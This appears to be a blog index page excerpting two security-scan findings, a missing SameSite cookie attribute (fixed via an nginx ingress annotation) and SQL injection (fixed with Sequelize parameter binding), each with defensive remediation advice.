Issue Cookie with Insecure or Improper or Missing SameSite attribute Risk Prevent cookie information leakage by restricting cookies to first-party or same-site context, Attacks can extend to Cross-Site- Request-Forgery (CSRF) attacks if there are no additional protections in place (such as Anti-CSRF tokens). Cause Sensitive Cookie with Improper or Insecure or Missing SameSite Attribute Fix Review possible solutions for configuring SameSite Cookie attribute to recommended values for K8s, you may edit the ingress configuration, set samesite value nginx.ingress.kubernetes.io/session-cookie-samesite: "Strict" ……

阅读全文

Security Risk: It is possible to view, modify or delete database entries and tables Cause: Sanitation of hazardous characters was not performed correctly on user input Fix: Review possible solutions for hazardous character injection Reasoning: The test result seems to indicate a vulnerability because it shows that values can be appended to parameter values, indicating that they were embedded in an SQL query. In this test, three (or sometimes four) requests are sent. The last is logically equal to the original, and the next-to-last is different. Any others are for control purposes. A comparison of the last two responses with the first (the last is similar to it, and the next-to-last is different) indicates that the application is vulnerable. How to fix https://sequelize.org/v5/manual/raw-queries.html make sure to ‘replace’/‘bind’……

阅读全文